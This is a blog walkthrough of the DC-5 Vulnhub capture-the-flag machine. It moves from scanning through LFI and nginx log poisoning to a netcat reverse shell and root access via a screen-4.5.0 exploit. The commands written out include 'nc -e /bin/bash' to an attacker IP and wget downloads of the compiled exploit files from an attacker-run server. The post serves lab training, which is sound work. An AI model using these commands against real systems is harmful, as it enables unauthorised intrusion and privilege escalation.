DC-5 Vulnhub Walkthrough

at 9:39 AM Saturday, June 1, 2019

Today we are going to take another boot2root challenge known as “DC-5”. The credit for making this VM machine goes to “DCAU” and it is another boot2root challenge in which our goal is to get root access to complete the challenge. You can download it from here.
Security Level: Beginner

Penetrating Methodology

Scanning
  • Discovering Targets IP
  • Network scanning (Nmap)
Enumeration
  • Surfing HTTP service port
  • Abusing CMS using LFI to get /etc/passwd
  • Checking Ngnix Access Logs
Exploiting
  • Exploiting LFI vulnerability using Burpsuite
  • Using Netcat to get the reverse shell
  • Spawning a tty shell
Privilege Escalation
  • Checking SUID binaries
  • Kernel privilege Escalation
  • Accessing root directory
  • Capture the flag

Walkthrough

Scanning

Let’s start off with scanning the network to find our target.
netdiscover



We found our Targets IP Address 192.168.1.108. Our next step is to scan our targets IP Address with nmap.
nmap -A 192.168.1.108



Enumeration
From nmap result we found HTTP service is running on port 80. So, we browsed the Targets IP Address in the browser.  Let’s explore the webpage for hints.



While exploring the page, we found a contact form which seems interesting. We filled the form and submitted it.



After submitting the form, we notice the Copyright says 2019.



On refreshing the page multiple times, we notice changes in Copyright year i.e 2020 AND 2019 where it was called on thankyou.php file.




Quickly checking for LFI Vulnerability to obtain the /etc/passwd file.



After going through various files path, we found nginx access log file.



Let’s capture the request of the Nginx Access log file using Burpsuite. Here we will be using LFI to exploit apache access log.



Exploiting LFI
In place of the file path, we have injected a Code to get the command line access by making a GET request to the Server.



To verify that it is working or not, we have added a new parameter to the URL i.e &cmd=id. Therefore from the output, it confirms we have successfully executed the command on the server.

Privilege Escalation

Using netcat shell with cmd. This will give us a reverse shell over our netcat listener which we have executed alongside.
nc -e /bin/bash 192.168.1.110 1234



Booyeah!! We have got the reverse shell. To get the proper shell, we have Spawn the Python TTY Shell. Without wasting much time, I looked for SUID enabled binaries and here /bin/screen-4.5.0 looks interesting.
nc -lvp 1234



Privilege Escalation
It quickly strikes us to look for this term screen-4.5.0 using searchsploit. And what we got was a LOCAL PRIVILEGE ESCALATION Exploit. We have copied the exploit on our system.
searchsploit screen 4.5.0
searchsploit -m 41154



When we didn’t find any appropriate method to execute this shell script for post exploitation then I go with manual compilation and review its code using cat command.
cat  41154.sh

If you will notice the following code then you will observe this script is written in C language and we have divided it into three part for manual compilation.
  • Copy Yellow highlighted the code and past it in a text document and save it as libhax.c
  • Copy Orange highlighted the code and past it in a text document and save it as rootshell.c
At last copy remaining code and past it in a text document and save it as 41154.sh



From given below image you can see I have pasted above copied code inside rootshell.c



From given below image you can see I have pasted above copied inside libhax.c



From given below image you can see I have pasted above remaining copied inside 41154.sh and save all three text document inside the /etc directory on our system.



Let’s compile our C program file manually in our local system using gcc. Similarly compile rootshell.c file.
gcc -fPIC -shared -ldl -o libhax.so libhax.c
gcc -o rootshell rootshell.c
Since we have stored all the files in a folder shell, now let’s upload them into the target’s system using python server.
python -m SimpleHTTPServer



Let’s just downloading all the files inside the /tmp folder of the previous reverse shell.
wget http://192.168.1.110:8000/41154.sh
wget http://192.168.1.110:8000/libhax.so
wget http://192.168.1.110:8000/rootshell



After making the file executable and running, we have got the root access. One final thing to do is to read our FINAL FLAG.
chmod 777 41154.sh
./41154.sh
id
cd /root
ls
cat thisistheflag.txt


Labels:

0 comments:

Post a Comment

Subscribe to: Post Comments (Atom)